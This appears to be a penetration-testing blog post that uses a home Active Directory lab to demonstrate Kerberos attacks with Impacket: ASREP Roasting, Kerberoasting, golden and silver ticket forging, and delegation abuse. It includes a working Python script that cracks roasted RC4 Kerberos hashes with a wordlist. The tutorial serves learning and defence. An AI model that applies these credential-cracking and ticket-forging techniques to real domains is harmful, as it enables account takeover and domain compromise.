Impacket Deep Dives Vol. 2: Attacking Kerberos

Cerberus: the 3-headed guard of the underworld in Greek myth

Overview

In my previous post, I discussed different ways to get command execution on Windows hosts with Impacket. In this post, I’m going to discuss how to attack Kerberos in Windows Active Directory with Impacket’s toolset.

Lab Setup

For the purposes of this series, I’ve built a (very) small Active Directory lab with a Domain Controller and two Windows workstations that are joined to the domain:

  • KANTO.local/SQUIRTLE 10.0.1.52
  • KANTO.local/IVYSAUR 10.0.1.53

Attack I: ASREP Roasting

Unlike some of the attacks that will be covered later in this article, ASREP Roasting is somewhat uncommon, so I’ve provided a section on the theory of how the attack works as well as details on how to exploit it.

Theory

The underlying weakness that ASREP Roasting exploits is not a bug in the protocol but a per-account, non-default userAccountControl flag called UF_DONT_REQUIRE_PREAUTH, which exists for backwards compatibility with older Kerberos implementations. Normally the KDC only answers a KRB_AS_REQ once the client has proven it knows the password through pre-authentication (a timestamp encrypted with the user’s key). If the flag is set for a user account, the KDC answers any KRB_AS_REQ for that account with a KRB_AS_REP (hence ASREP Roasting) carrying a TGT, and the enc-part of that reply is encrypted with a key derived from the user’s password (for RC4-HMAC, etype 23, that key is the NT hash). Details of these messages can be found in RFC 4120. In essence, if you know the username of a domain user that has this flag set, you can obtain ciphertext under that user’s password without ever authenticating, and crack it offline.

Exploitation

To exploit this with Impacket’s GetNPUsers.py, we need a list of usernames to try to ASREP Roast. If you already have domain credentials, let the tool query LDAP for accounts with the flag set (userAccountControl bit 4194304 / 0x400000) rather than guessing. Without credentials, you can run it blind with a wordlist of usernames (-usersfile) that may or may not exist in the domain: accounts that don’t exist come back as unknown principal, and accounts that require pre-authentication come back as KDC_ERR_PREAUTH_REQUIRED. Because a pre-auth-less AS-REQ never contains a password guess, those failures do not increment the bad-password count, so this does not push accounts toward lockout; the requests still reach the KDC and can be audited there, so it is not silent either.

ASREP Roasting the users on our wordlist
Cracking the ASREP Roasted Users’ passwords

Attack II: Kerberoasting

Kerberoasting is a super common and well-known attack, so I won’t go into the mechanics in depth. The short version: any authenticated domain user can request a service ticket (KRB_TGS_REQ) for any registered SPN, and the ticket comes back encrypted with the long-term key of the account that owns the SPN. When that owner is a user account rather than a computer account, the ticket’s ciphertext can be cracked offline against candidate passwords, just like an AS-REP. To launch the attack with GetUserSPNs.py, you need credentials for a domain user (a password, an NTLM hash, or a Kerberos ticket). The tool writes the tickets out in the $krb5tgs$23$ format, which both John the Ripper and Hashcat (mode 13100) accept.
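The following is an added example, not Impacket’s code or anything from the original post. It demonstrates the offline half of both the ASREP Roasting theory above and Kerberoasting: the AS-REP enc-part is encrypted under a key derived from the user’s password, the TGS-REP ticket under the service account’s key (both the NT hash for RC4-HMAC, etype 23), so a candidate password can be verified without touching the KDC. It builds its own sample hashes in the hashcat-style format GetNPUsers.py and GetUserSPNs.py print (the usernames, realm, SPN, passwords and placeholder plaintexts are constructed), then runs a small dictionary attack against them. The key-usage values (8 for AS-REP, 2 for the TGS-REP ticket) are the RFC 4757 values Impacket’s own RC4 cipher uses.

```python
"""Offline check of $krb5asrep$23$ / $krb5tgs$23$ hashes (RC4-HMAC). Added example, not Impacket code."""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    rounds = (  # (word order, shift amounts, additive constant, boolean function)
        (range(16), (3, 7, 11, 19), 0, lambda b, c, d: (b & c) | (~b & d)),
        ([(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999,
         lambda b, c, d: (b & c) | (b & d) | (c & d)),
        ([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1,
         lambda b, c, d: b ^ c ^ d),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for order, shifts, k, f in rounds:
            for i, idx in enumerate(order):
                a, b, c, d = d, _rol((a + f(b, c, d) + x[idx] + k) & MASK, shifts[i % 4]), b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the RC4-HMAC Kerberos long-term key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# RFC 4757 key-usage (T) values for etype 23: the AS-REP enc-part uses 8 (Impacket's
# crypto.py maps RFC 4120 usage 3 to 8 for RC4-HMAC), the TGS-REP ticket enc-part uses 2.
USAGE = {"asrep": 8, "tgs": 2}


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> tuple:
    """RFC 4757 encryption of (8-byte confounder || plaintext); returns (checksum, ciphertext)."""
    ki = _hmac_md5(key, struct.pack("<I", usage))
    data = os.urandom(8) + plaintext
    checksum = _hmac_md5(ki, data)
    return checksum, rc4(_hmac_md5(ki, checksum), data)


def parse_roast_line(line: str) -> tuple:
    """Split an Impacket hashcat-format line into (key usage, checksum, ciphertext)."""
    if line.startswith("$krb5asrep$23$"):   # $krb5asrep$23$user@REALM:<cksum>$<ct>
        cksum_hex, ct_hex = line.split(":", 1)[1].split("$")
        usage = USAGE["asrep"]
    elif line.startswith("$krb5tgs$23$"):   # $krb5tgs$23$*user$REALM$spn*$<cksum>$<ct>
        cksum_hex, ct_hex = line.rsplit("$", 2)[1:]
        usage = USAGE["tgs"]
    else:
        raise ValueError("unsupported hash format")
    return usage, bytes.fromhex(cksum_hex), bytes.fromhex(ct_hex)


def check_candidate(line: str, password: str) -> bool:
    """True if the candidate password decrypts the enc-part and the HMAC-MD5 checksum verifies."""
    usage, checksum, ct = parse_roast_line(line)
    ki = _hmac_md5(nt_hash(password), struct.pack("<I", usage))
    data = rc4(_hmac_md5(ki, checksum), ct)
    return hmac.compare_digest(_hmac_md5(ki, data), checksum)


def crack(line: str, wordlist):
    """Dictionary attack: one MD4, three HMAC-MD5s and one RC4 per guess, no KDC involved."""
    for pw in wordlist:
        if check_candidate(line, pw):
            return pw
    return None


# Constructed sample data (no real domain). Real plaintexts are ASN.1 EncASRepPart / EncTicketPart.
def make_asrep_line(user, realm, password):
    cksum, ct = rc4_hmac_encrypt(nt_hash(password), USAGE["asrep"], b"EncASRepPart placeholder")
    return f"$krb5asrep$23${user}@{realm}:{cksum.hex()}${ct.hex()}"


def make_tgs_line(user, realm, spn, svc_password):
    cksum, ct = rc4_hmac_encrypt(nt_hash(svc_password), USAGE["tgs"], b"EncTicketPart placeholder")
    return f"$krb5tgs$23$*{user}${realm}${spn}*${cksum.hex()}${ct.hex()}"


ASREP_LINE = make_asrep_line("misty", "KANTO.LOCAL", "Starmie1!")
TGS_LINE = make_tgs_line("svc_sql", "KANTO.LOCAL", "MSSQLSvc/ivysaur.kanto.local:1433", "Summer2019!")
WORDLIST = ["Password1", "Welcome1", "Summer2019!", "Starmie1!", "kanto2020"]

if __name__ == "__main__":
    for label, line in (("AS-REP", ASREP_LINE), ("TGS-REP", TGS_LINE)):
        print(label, "->", crack(line, WORDLIST))
```

The point to take away is the cost model: every guess is a handful of cheap hash operations with no rate limit and no log entry, which is why the password length of accounts without pre-auth and of user accounts holding SPNs matters far more than any lockout policy.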

Attack III: Golden Ticket

Impacket contains tools for both forging and using golden tickets, so in this section, I’m going to go over how to forge one, and then how to actually use it with Impacket’s various tools for command execution.

Forging a Golden Ticket

To forge a golden ticket with ticketer.py, we need two pieces of information: the NT hash of the krbtgt account and the domain SID. Both can be obtained with Impacket’s secretsdump.py, assuming we have Administrator access to the domain controller (lookupsid.py will also print the domain SID and only needs a valid domain account). Any ticket forged with the krbtgt key stays valid until that key is rotated twice, so treat the hash as the domain’s master secret:

Finding the NTHash for the krbtgt account
Finding the domain SID
Forging a golden ticket for the domain administrator “brock”

Using a Golden Ticket

If you have a golden ticket in the .kirbi format (commonly used by Mimikatz and various PowerShell tools), you need to convert it into a .ccache file with Impacket’s ticketConverter.py, as shown below. If you forged it with ticketer.py, you should already have a .ccache file and can skip this step. Then point Impacket at the file through the KRB5CCNAME environment variable and run the execution tool of your choice with -k -no-pass. One caveat: since this is Kerberos, target hosts by a hostname that resolves (and matches the service’s SPN), not by IP address, or the ticket will not be used.

Converting a .kirbi file into a .ccache file
Setting the KRB5CCNAME environment variable for Impacket
Using a golden ticket

Attack IV: Silver Ticket

This attack is very similar to the golden ticket attack, so I’m just going to briefly give the command to forge it. The difference is the key: a silver ticket is a forged service ticket encrypted with the key of the account that runs the target service (for CIFS or HOST on a workstation, that machine’s computer-account NT hash) rather than the krbtgt key, and the target service is passed to ticketer.py with -spn. It is only valid against that one service, but because it is never issued by the KDC, the domain controller has no record of it:

Footnote: Attack V: Abusing Unconstrained Delegation

Theory

Delegation is a way to let a service or computer authenticate to other services on behalf of a user who has authenticated to it. There are two types of delegation: constrained and unconstrained. Constrained delegation lets you list the specific SPNs (services) the account is allowed to delegate to. With unconstrained delegation, any user who authenticates to the service sends along a forwardable TGT, which the service caches and can use to impersonate that user to any service in the domain, so whoever controls such a host can harvest those TGTs (accounts marked “sensitive and cannot be delegated” and members of Protected Users are excluded). Unconstrained delegation is especially common in older domains: constrained delegation only arrived with Windows Server 2003, and domain controllers are still configured for unconstrained delegation by default.

Exploitation

Exploiting unconstrained delegation is a pretty long and involved process, so I’m adding it as a footnote here. If you’re interested in reading a solid write-up on how to exploit it, pour yourself a cup of coffee and check out this article.

Conclusion

In this article, I’ve gone over how to exploit common vulnerabilities in Kerberos and Active Directory using the Impacket suite. Let me know what you think below!

Student, hacker, OSCP. My other computer is your computer.